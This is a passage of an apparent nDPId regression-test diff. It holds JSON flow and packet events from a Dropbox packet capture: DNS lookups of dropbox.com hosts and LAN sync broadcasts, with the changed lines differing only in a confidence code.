+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":807,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182798651,"flow_last_seen":1459182798651,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1459182798651,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": 
{"query":"d.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":808,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1459182798651,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1459182798651,"pkt":"8IQvSpdgeJKcD6iOCABFAAA7OV1AAEARfJ3AqAFpwKgB\/sZlADUAJw161e8BAAABAAAAAAAAAWQHZHJvcGJveANjb20AAAEAAQ=="} 00788{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1459182798781,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1459182798781,"pkt":"eJKcD6iO8IQvSpdgCABFAAEkAABAAEARtRHAqAH+wKgBaQA1v9gBEDDEI4aBgAABAAEABAAECWNsaWVudC1jZgdkcm9wYm94A2NvbQAAAQABwAwAAQABAAAAFAAENvCuH8AWAAIAAQABU2AAGQducy0xOTQ5CWF3c2Rucy01MQJjbwJ1awDAFgACAAEAAVNgABcHbnMtMTE2Mglhd3NkbnMtMTcDb3JnAMAWAAIAAQABU2AAFgZucy01NjQJYXdzZG5zLTA2A25ldADAFgACAAEAAVNgABMGbnMtMzE1CWF3c2Rucy0zOcAewK0AAQABAAIhDwAEzfvBO8CLAAEAAQABU1QABM37wjQHTlMtMTE2MsBwAAEAAQABU10ABM37xIrAQwABAAEAAVNaAATN+8ed"} -00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":809,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182798602,"flow_last_seen":1459182798781,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1459182798781,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client-cf.dropbox.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.240.174.31"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":809,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182798602,"flow_last_seen":1459182798781,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":342,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1459182798781,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"client-cf.dropbox.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.240.174.31"}} 00813{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":811,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1459182798820,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"thread_ts_msec":1459182798820,"pkt":"eJKcD6iO8IQvSpdgCABFAAE1AABAAEARtQDAqAH+wKgBaQA1xmUBIb321e+BgAABAAMABAAEAWQHZHJvcGJveANjb20AAAEAAcAMAAUAAQAAAQsABgFkAXbADsArAAEAAQAAAC0ABGygrOHAKwABAAEAAAAtAARsoKzBwC0AAgABAAD1swAXB25zLTEyNzYJYXdzZG5zLTMxA29yZwDALQACAAEAAPWzABIFbnMtNTcJYXdzZG5zLTA3wBbALQACAAEAAPWzABYGbnMtNzczCWF3c2Rucy0zMgNuZXQAwC0AAgABAAD1swAZB25zLTE5MjYJYXdzZG5zLTQ4AmNvAnVrAMCAAAEAAQACRwcABM37wDnAngABAAEAAkbtAATN+8MFwF0AAQABAAJG7QAEzfvE\/MDAAAEAAQACRuIABM37x4Y="} 
-00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":811,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182798651,"flow_last_seen":1459182798820,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":343,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"d.dropbox.com","num_queries":1,"num_answers":11,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"108.160.172.225"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907271481,"flow_last_seen":1455907282686,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11720,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907274088,"flow_last_seen":1455907285181,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11794,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907272856,"flow_last_seen":1455907284046,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11820,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907275690,"flow_last_seen":1455907286608,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":811,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182798651,"flow_last_seen":1459182798820,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":343,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"d.dropbox.com","num_queries":1,"num_answers":11,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"108.160.172.225"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907271481,"flow_last_seen":1455907282686,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11720,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907274088,"flow_last_seen":1455907285181,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11794,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907272856,"flow_last_seen":1455907284046,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11820,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907275690,"flow_last_seen":1455907286608,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1459182798820,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182816605,"flow_last_seen":1459182816605,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182816605,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1459182816605,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1459182816605,"pkt":"8IQvSpdgeJKcD6iOCABFAABAP3NAAEARdoLAqAFpwKgB\/o1NADUALHL+F+YBAAABAAAAAAAAA2xvZwpnZXRkcm9wYm94A2NvbQAAAQAB"} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182816605,"flow_last_seen":1459182816605,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182816605,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"log.getdropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":813,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182816605,"flow_last_seen":1459182816605,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182816605,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"log.getdropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":814,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1459182816605,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1459182816605,"pkt":"8IQvSpdgeJKcD6iOCABFAABAP3NAAEARdoLAqAFpwKgB\/o1NADUALHL+F+YBAAABAAAAAAAAA2xvZwpnZXRkcm9wYm94A2NvbQAAAQAB"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":815,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1459182816605,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1459182816605,"pkt":"8IQvSpdgeJKcD6iOCABFAABAP3RAAEARdoHAqAFpwKgB\/o1NADUALO8im6YBAAABAAAAAAAAA2xvZwpnZXRkcm9wYm94A2NvbQAAHAAB"} 
-00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":815,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182816605,"flow_last_seen":1459182816605,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182816605,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"log.getdropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":817,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1459182816605,"flow_last_seen":1459182816645,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1459182816645,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"log.getdropbox.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":5,"rsp_addr":"0.0.0.0"}} 
+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":815,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182816605,"flow_last_seen":1459182816605,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182816605,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"log.getdropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":817,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1459182816605,"flow_last_seen":1459182816645,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1459182816645,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"log.getdropbox.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":28,"rsp_type":5,"rsp_addr":"0.0.0.0"}} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":821,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182817566,"flow_last_seen":1459182817566,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1459182817566,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1459182817566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1459182817566,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAADfQ1JAAEARNKvAqAFp\/\/\/\/\/0RcRFwAy8gLeyJob3N0X2ludCI6IDI3NDM2MzU3MDAzNjkzNDgyMzM2MDM0MTQwOTA1MTg0MTU3MzU3OSwgInZlcnNpb24iOiBbMiwgMF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDYwMzE0MCwgMTY3MTU2ODYsIDQ4NzQ1ODk1LCAxOTA3NjA0MCwgODc5NTY4MDQzLCAxMjM1MzUwMzAsIDE4MjE2NDkyMl19"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":821,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182817566,"flow_last_seen":1459182817566,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1459182817566,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":821,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182817566,"flow_last_seen":1459182817566,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1459182817566,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":822,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1459182817566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1459182817566,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAADfQ1JAAEARNKvAqAFp\/\/\/\/\/0RcRFwAy8gLeyJob3N0X2ludCI6IDI3NDM2MzU3MDAzNjkzNDgyMzM2MDM0MTQwOTA1MTg0MTU3MzU3OSwgInZlcnNpb24iOiBbMiwgMF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDYwMzE0MCwgMTY3MTU2ODYsIDQ4NzQ1ODk1LCAxOTA3NjA0MCwgODc5NTY4MDQzLCAxMjM1MzUwMzAsIDE4MjE2NDkyMl19"} 
00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1459182817566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1459182817566,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAADfQ1JAAEARNKvAqAFp\/\/\/\/\/0RcRFwAy8gLeyJob3N0X2ludCI6IDI3NDM2MzU3MDAzNjkzNDgyMzM2MDM0MTQwOTA1MTg0MTU3MzU3OSwgInZlcnNpb24iOiBbMiwgMF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDYwMzE0MCwgMTY3MTU2ODYsIDQ4NzQ1ODk1LCAxOTA3NjA0MCwgODc5NTY4MDQzLCAxMjM1MzUwMzAsIDE4MjE2NDkyMl19"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":824,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182817566,"flow_last_seen":1459182817566,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1459182817566,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1459182817566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1459182817566,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAADf1cRAAEAR35DAqAFpwKgB\/0RcRFwAywVkeyJob3N0X2ludCI6IDI3NDM2MzU3MDAzNjkzNDgyMzM2MDM0MTQwOTA1MTg0MTU3MzU3OSwgInZlcnNpb24iOiBbMiwgMF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDYwMzE0MCwgMTY3MTU2ODYsIDQ4NzQ1ODk1LCAxOTA3NjA0MCwgODc5NTY4MDQzLCAxMjM1MzUwMzAsIDE4MjE2NDkyMl19"} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182817566,"flow_last_seen":1459182817566,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1459182817566,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182817566,"flow_last_seen":1459182817566,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1459182817566,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": 
